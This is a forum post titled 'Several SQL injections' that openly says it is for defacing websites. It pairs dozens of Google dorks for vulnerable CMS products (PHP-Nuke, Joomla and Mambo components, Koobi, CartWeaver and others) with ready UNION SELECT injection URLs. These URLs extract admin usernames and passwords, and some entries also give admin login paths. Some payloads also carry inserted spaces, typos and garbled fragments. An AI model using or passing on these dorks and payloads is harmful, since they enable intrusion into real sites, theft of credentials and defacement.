Several SQL injections

Old 01-Aug-2009, 20:41
the_patox
Location: valpo
Posts: 107
Likes received: 2
For defacing
some come with examples

----------------------------

Dork: modules.php?name=Statistics Version PHP-Nuke
Exploit: modules.php?name=Search&type=c omments&%20%20%20query=&%20%20 %20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

----------------------------

Dork: allinurl:"com_newsletter"
Injection: index.php?option=com_newslette r&ltemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*

----------------------------

Dork: allinurl:"com_fq"
Injection: index.php?option=com_fq&ltemid =S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

----------------------------

Dork: allinurl:"com_mamml"
Injection: index.php?option=com_mamml&lis tid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_glossary"
Injection: index.php?option=com_glossary& func=display&ltemid=s@bun&cati d=-1%20union"20select%201,usernam e,password,4,5,6,7,8,9,10,11,1 2,13,14%20from%20mos_users--

-----------------------------

Dork: allinurl:"com_museopes"
Injection: index.php?option=com_museopes& task=ansewer&ltemid=s@bun&cati d=s@bun&aid=-1/**/union/**/select/**/0,usermane,password,0x3a,0x3a, 3,0,0x3a,0,5,5,0,0x3a/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_recipes"
Injection: index.php?option=com_recipes&l temid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),username,0x3a,5,6,7,8,9,1 0,11,12,0x3a,0x3a,0x3a,usernam e,username,0x3a,0x3a,0x3a,21,0 x3a/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_jokes"
Injection: index.php?option=com_jokes&lte mid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7, 8/**/from/**/mos_users/*


-------------------------------

Dork: allinurl:"com_estateagent" = MANY SITES WITH MYSQL ERROR
Injection: index.php?option=com_estateage nt&ltemid=S@BUN&func=showObjec t&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

-------------------------------

Dork: allinurl:"com_akogallery"
Injection: index.php?option=com_akogaller y&ltemid=S@BUN&func=detail&id= 334455/**/union/**/select/**/null,null,concat(password,0x3a ),null,null,null,null,null,nul l,null,null,null,null,null,nul l,null,null,null,null,null,con cat(0x3a,username)/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_catalogshop"
Injection: index.php?option=com_catalogsh op&ltemid=S@BUN&func=detail&id =-1/**/union/**/select/**/null,null,concat(password),3,4 ,5,6,7,8,9,10,11,12,concat(use rname)/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_restaurant"
Injection: index.php?option=com_restauran t&ltemid=S@BUN&func=detail&i d=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0 ,username/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_neoconferences"
Injection: index.php?option=com_neoconfer ences&ltemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%user_id=1=1/*

-------------------------------

Dork: Powered by GameSiteScript
Injection: '+union+select+0,username,0,0, 0,0,0,0,0,0,0,0,0,0,password,0 ,0,0,0,0,0+from+members+where+ id='1

-----------------------------

Dork: Splatt Forum c By Splatt.it
Injection: modules.php?name=Search&type=c omments&%20%20%20query=&%20%20 %20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

-----------------------------

Dork: allinurl:"modules.php?name=sea rch"
Injection: UNION SELECT 0,user_id,username,user_passwo rd,0,0,0,0,0,0 FROM nuke_users/*

-----------------------------

Dork: allinurl:links.asp?action=what snew
Injection: links.asp?action=reporterror&l inkID=2vepassword,0,0,0,0,0,0+ from +config

-----------------------------

Dork: "This site is powered by IndexScript"
Exploit: show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

-----------------------------

Koobi Pro 6.25 shop
Google search: Koobi Pro 6.25 shop
SQL injection:
index.php?p=shop&show=showdeta il&fid=ulus&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-----------------------------

Deface BlogSite
Google search: "Browse Blogs by Category"
SQL injection: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*
Example:
www.ejem.com/ index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*

------------------------------

Deface Bwired
Google search: "Powered by bwired" inurl:?newsID="
SQL injection:
index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a, 0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
Example:
www.pepito.com/ index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a, 0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

------------------------------

Deface Powered by AV Arcade
Google search: "Powered By AV Arcade"
SQL injection:
index.php?task=view_page&id=-1%20UNION%20SELECT%201,usernam e,password%20FROM%20 ava_users%20WHERE%20id=1
Example:
and it ends up something like this...
www.pepito.com/ index.php?task=view_page&id=-1%20UNION%20SELECT%201,usernam e,password%20FROM%20 ava_users%20WHERE%20id=1

-------------------------------


Deface Powered by Xt-News
Google search: "Powered by Xt-News"
SQL injection:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,use r,null,null,mdp,null ,null,null,null,null,null%20FR OM%20xtnews_users%20 WHERE%20%20admin=1
Example:
www.pepito.com/ show_news.php?id_news=-1%20UNION%20SELECT%20%20id,use r,null,null,mdp,null ,null,null,null,null,null%20FR OM%20xtnews_users%20 WHERE%20%20admin=1


--------------------------------

Deface Supercali Event
Google search: "SuperCali Event Calendar"
SQL injection:
index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password ),4,5,0x677269642E70 6870/**/from/**/users/*
Example:
www.pepito.com/ index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password ),4,5,0x677269642E70 6870/**/from/**/users/*


--------------------------------

Deface Powered by eWriting 1.2.1
We'll search on Google: com_ewriting
SQL injection for the ones that are Joomla:
index.php?option=com_ewriting& Itemid=9999&func=selectcat&cat =-1+UNION+ALL+SELECT+1,2,concat( username,0x3a,password),4,5,6, 7,8,9,10+FROM+jos_users--
SQL injection for the ones that are Mambo:
index.php?option=com_ewriting& Itemid=9999&func=selectcat&cat =-1+UNION+ALL+SELECT+1,2,concat( username,0x3a,password),4,5,6, 7,8,9,10+FROM+mos_users--

---------------------------------

Deface KwsPHP v1.3.456 SQL
Google search: "index.php?mod=galerie"action= gal
SQL injection: index.php?mod=galerie&action=g al&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),c oncat(pseudo,0x3a,pass),4,5,6, 7/**/from/**/users/*

-----------------------------------

Deface Powered by Esy SQL
Google search: \"Powered by Esy\"
SQL injection: sections.php?op=viewarticle&ar tid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
SQL injection 2: sections.php?op=printpage&arti d=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

-----------------------------------

Deface showresult
Google search: allinurl: "index.php?p=poll"showresu lt
SQL injection: index.php?p=poll&showresult=1& poll_id=-1+union+select+concat(email,0x 3a,pass),1,2,3+from+kpro_user

----------------------------------

Deface Showlink
Google search: allinurl: "index.php?showlink"links
SQL injection: index.php?showlink=ulus&fid=ul us8&p=links&area=1&c ateg=-1+union+select+0,concat(email, 0x3a,pass),2+from+kp ro_user
Admin Login: login=admin/login.php

-----------------------------------

Deface powered by koobi-cms 4.3.0
Google search: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
SQL injection: index.php?area=1&p=gallery&act ion=showimages&galid=[SQL]
THIS ONE FOR THE ADMIN: -104+union+all+select+1,concat( email,0x203a3a20,pass),3+from+ koobi4_user/*

-----------------------------------

Deface Powered by BosClassifieds Classified Ads System
Google search: "Powered by BosClassifieds Classified Ads System"
SQL injection: site.c0m/bosclassifieds/index.php?cat=[SQL]
Only for version: BosClassifieds 3.0

-------------------------------------

Deface pollBooth
Google search: allinurl: "pollBooth.php?op=results"poll ID
SQL injection: pollBooth.php?op=results&pollI D=-1+union+select+password,1,2,3+ from+users

Deface gallerypic img
Google search: allinurl: "index.php?p=gallerypic img_id"
SQL injection: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
SQL injection 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Admin Login: login=admin/login.php

-------------------------------------

Deface RS MAXSOFT
Google search: "RS MAXSOFT"
SQL injection: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x 3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm

-------------------------------------

Deface gallerypic img
Google search: allinurl: "index.php?p=gallerypic img_id"
SQL injection: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6,7,8+from+ koobi4_user
SQL injection 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6,7,8+from+ koobi_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powered By SSWD
Google search: allinurl: "index.php?go=subcat"
SQL injection: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6/**/from/**/admin/*

-------------------------------------

Deface Powered by OpenLD
Google search: "Powered by OpenLD"
SQL injection: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value ,null,null,null,null ,null,null,null,null/**/FROM/**/settings--

-------------------------------------

Deface Index php P Shop
Google search: allinurl: "index php p shop"categ
SQL injection: index.php?p=shop&show=showdeta il&fid=ulus&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powered by Site Sift
Google search 1: powered by Site Sift
Google search 2: allinurl: "index php go addpage"
Google search 3: allinurl: "index.php?go=detail id="
SQL injection 1: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16/**/from/**/admin/*
SQL injection 2: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20/**/from/**/admin/*
Admin Login: admin/login.php

-------------------------------------

Deface Showlink
Google search: allinurl: "index.php?showlink"links
SQL injection: index.php?showlink=ulus&fid=ul us8&p=links&area=1&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powered by eSyndiCat
Google search: © 2005-2006 Powered by eSyndiCat Directory Software
SQL injection: news.php?id=-1%27%20union%20select%201,user name,password,4,5%20 from%20dir_admins/*
Admin Login: from%20dir_admins/*

-------------------------------------

Deface CartWeaver
Google search: allinurl:Results.cfm?category=
SQL injection to get the admin's name: Details.cfm?ProdID=1%20and%201 =convert(int,(select %20top%201%20admin_username%20 from%20tbl_adminuser s))
SQL injection to get the password: Details.cfm?ProdID=1%20and%201 =convert(int,(select %20top%201%20char(97)%2badmin_ password%20from%20tb l_adminusers))
Admin Login: /cw2/admin/

-------------------------------------


Deface Powered by Md-Pro
Google search: "Powered by Md-Pro"
SQL injection: index.php?module=Topics&func=v iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a ,pn_pass),null,null, null,null from md_users where pn_uid=2/*

--------------------------------------

Deface Browse Blogs by Category
Google search: allintext:"Browse Blogs by Category"
SQL injection: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*

--------------------------------------

Deface eMeeting Online Dating Software 5.2
Google search: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
SQL injection 1: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pas sword),5,6,7,8,9,10/**/from/**/members/*
SQL injection 2: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pas sword),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

---------------------------------------

Deface FlashGameScript 1.7
Google search: "Powered by FlashGameScript"
SQL injection 1: index.php?func=member&user='+u nion+select+0,0,0,0, 0,0,0,0,0,0,username,password, 0,0,0,0,0,user_type+ from+members+where+user_type=2/*
SQL injection 2: index.php?func=member&user='+u nion+select+0,0,0,0, 0,0,0,0,0,0,username,password, 0,0,0,0,user_type+fr om+members+where+user_type=2/*

---------------------------------------

Deface MD-Pro Forums
Google search: "Powered by Md-Pro"
SQL injection: index.php?module=Topics&func=v iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a ,pn_pass),null,null, null,null from md_users where pn_uid=2/*

---------------------------------------

Deface Miniweb
Google search: miniweb2/index.php?module=
SQL injection: index.php?module=blogwriter&hi storyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,u sername,password),4,5,6,7,8,9, 10/**/from/**/admin_access/*

---------------------------------------

Deface Iblog
Google search: Iblog
SQL injection: /comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+L OGIN+WHERE+ID=1

----------------------------------------

Deface Expert Advidior
Google search: intitle:"Answer Builder" Ask a question
SQL injection: /index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0 x3c623e,username,0x3 a,password,0x3c623e),9,10,11,1 2,13,14,15/**/FROM/**/admin/*

----------------------------------------

Deface Dvbbs Version 7.1.0 Sp1
Google search: "Powered By Dvbbs Version 7.1.0 Sp1"
SQL injection: /Data/Dvbbs7.mdb

-----------------------------------------

Deface Fundlink SQL
What we'll search for on Google: allinurl: \"fundlinkllc.com\"
SQL injection: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

----------------------------------------

Deface PHP-Newsletter(cat_id) SQL
What we'll search for on Google: llinurl: \"index.php?pgid\"cat_id
SQL injection: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,userna me,0x7c,password),0x 3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

----------------------------------------

Deface Powered by Com Endeavors SQL
Google search: allinurl: \"index.php?go=detail\"
SQL injection: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email ,0x3a,concat(usernam e,0x3a,password),1,1,1,1,1,1,2 ,2,2,2,2/**/from/**/admin/*where,limit,2--

-----------------------------------------

Deface Powered by niccell SQL
Google search: "powered by niccell"
SQL injection: list.php?pagenum=S@BUN&categor yid=9999+union+selec t+111,222,concat(login,0x3a,pa ssword),444+from+adm in_login/*

------------------------------------------

Deface Powered by SmallBiz eShop
Google search: Powered by SmallBiz eShop
SQL injection: index.php?content_id=-20'%20union%20select%20convert (concat(database(),c har(5,8)user(),char(5Cool,vers ion()),char)/*

------------------------------------------
ElAfter.com 2005-2014 @ Some rights reserved - Developed by Digital Grid